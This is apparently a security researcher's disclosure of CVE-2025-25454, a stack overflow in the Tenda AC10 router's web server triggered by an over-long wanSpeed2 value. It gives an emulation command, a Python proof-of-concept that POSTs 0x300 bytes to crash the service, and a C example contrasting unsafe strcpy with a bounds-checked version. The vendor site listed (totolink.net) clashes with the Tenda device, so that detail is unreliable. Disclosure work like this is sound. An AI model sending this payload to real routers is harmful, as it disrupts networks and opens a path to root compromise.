- Affected Firmware: US_AC10V4.0si_V16.03.10.20_cn_TDC01
- CVE-ID: CVE-2025-25454
- Root Cause: By analyzing the webs file in the bin directory, I found that the function 0x45C380 contains a stack overflow vulnerability.
- Impact: Remote unauthenticated attackers can execute arbitrary commands as root.
- Vendor Website: https://www.totolink.net
- Affected Firmware Download: website
During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the Tenda-AC10 router.
By analyzing the webs file in the bin directory, I found that the function 0x45C380 contains a stack overflow vulnerability.
The stack overflow can be triggered by the wanSpeed2 key value, which leads to a strcpy stack overflow.
The function above clearly contains a stack overflow. To reach this code, `i` in the following function needs to be greater than 0.
Whether the vulnerable path is taken depends on v4, which holds wans.flag. In QEMU emulation the value read by GetValue("wans.flag", v4); is always 0, even though the default setting shown below suggests otherwise. On real hardware, however, the return value of GetValue("wans.flag", v4); can be made greater than 0. To reproduce the issue more reliably, I made the following modification.
With that in place, the code containing the vulnerability is reached, the stack overflow occurs, and the program's execution flow can be controlled.
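To make the root cause concrete, here is an added illustration (not the firmware's code) of the unbounded strcpy pattern described above beside a hardened handler that rejects over-long wanSpeed2 values before copying. The buffer size, the config store and every function name are assumptions, and the 'a'-filled input is constructed to mirror the PoC.

```c
#include <stddef.h>
#include <string.h>

/* Added illustration, not firmware code. The write-up only tells us that the
 * handler at 0x45C380 strcpy()s the wanSpeed2 form value into a fixed stack
 * buffer, reached only when wans.flag > 0. Buffer size and names are assumed. */
#define WAN_SPEED_BUF 32                 /* assumed size of the stack buffer */

static char g_wan_speed[WAN_SPEED_BUF];  /* stands in for the router's config store */

/* The pattern the write-up describes: unbounded strcpy of a request parameter
 * into a stack buffer. A value of 32 bytes or more overruns it. Shown only
 * for comparison with the hardened form below. */
void set_wan_speed_unsafe(const char *wanSpeed2)
{
    char buf[WAN_SPEED_BUF];
    strcpy(buf, wanSpeed2);              /* no length check */
}

/* Hardened form: look for the terminator only within the bound, reject any
 * value that does not fit together with its NUL, and only then copy.
 * Returns 0 on success, -1 on rejection (no silent truncation). */
int set_wan_speed_safe(const char *wanSpeed2)
{
    if (wanSpeed2 == NULL)
        return -1;
    const char *end = memchr(wanSpeed2, '\0', sizeof g_wan_speed);
    if (end == NULL)
        return -1;                       /* no NUL within 32 bytes: too long */
    size_t n = (size_t)(end - wanSpeed2);
    memcpy(g_wan_speed, wanSpeed2, n + 1);
    return 0;
}

/* Mirrors the gate from the write-up: the copy is only reached when
 * wans.flag > 0. Returns 1 when the path is skipped. */
int handle_adv_set_mac_mtu_wan(int wans_flag, const char *wanSpeed2)
{
    if (wans_flag <= 0)
        return 1;
    return set_wan_speed_safe(wanSpeed2);
}

/* Constructed input with the same shape as the PoC: n bytes of 'a'. */
const char *constructed_wan_speed(size_t n)
{
    static char v[0x400];
    if (n >= sizeof v) n = sizeof v - 1;
    memset(v, 'a', n);
    v[n] = '\0';
    return v;
}
```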
Use the following command to emulate the web server with FirmAE:

```shell
sudo chroot ./ ./qemu-mipsel-static ./bin/httpd
```
The content of the poc.py file is as follows:

```python
import requests

# Endpoint of the emulated httpd instance
url = "http://192.168.229.128/goform/AdvSetMacMtuWan"

# wanSpeed2 is copied with strcpy into a fixed-size stack buffer,
# so an over-long value overflows it
data = {
    "wanSpeed2": "a" * 0x300
}

res = requests.post(url, data=data)
print(res.text)
```
As the figure above shows, the request triggers the stack overflow and the process crashes with a segmentation fault.